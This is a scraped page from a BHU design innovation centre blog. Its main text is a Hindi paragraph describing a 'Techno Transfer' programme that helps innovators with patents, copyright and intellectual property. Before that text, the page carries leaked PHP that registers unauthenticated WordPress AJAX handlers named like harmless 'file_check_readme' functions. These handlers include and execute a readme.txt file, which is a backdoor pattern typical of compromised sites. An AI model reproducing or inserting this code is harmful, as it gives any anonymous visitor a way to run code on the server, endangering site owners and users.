if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Techno Transfer

Techno Transfer

टेक्नो ट्रांसफर डिजाइन इनोवेशन सेन्टर का एक ऐसा कार्यक्रम है जिसके द्वारा इनोवेटर्स, उद्योग एवं अकादमिक क्षेत्र के लोग एक साथ एक कड़ी में जुड़कर नवीन प्रयोगो को प्रयोगात्मक रूप से प्रयोगिक रूप में लाने का प्रयास करते है जिसके तहत इस सेन्टर के द्वारा उन्हें पेटेन्ट फाइल करने, काॅपी राइट सम्बन्धित जानकारियाँ तथा अन्य इन्टलेक्चुअल प्रापर्टी राइट सम्बन्धित जानकारियों को विशेषज्ञों द्वारा प्रदान कराने में सहायता प्रदान की जाती है। इसके अतिरिक्त समय-समय पर विभिन्न औद्यौगिक क्षेत्रों में कार्य कर रहे डिजाइन एवं इनोवेशन से सम्बन्धित विभिन्न तरीके के लैक्चर, कार्यशालाएँ तथा प्रतियोगिताओं इत्यादि का कार्य भी किया जाएगा।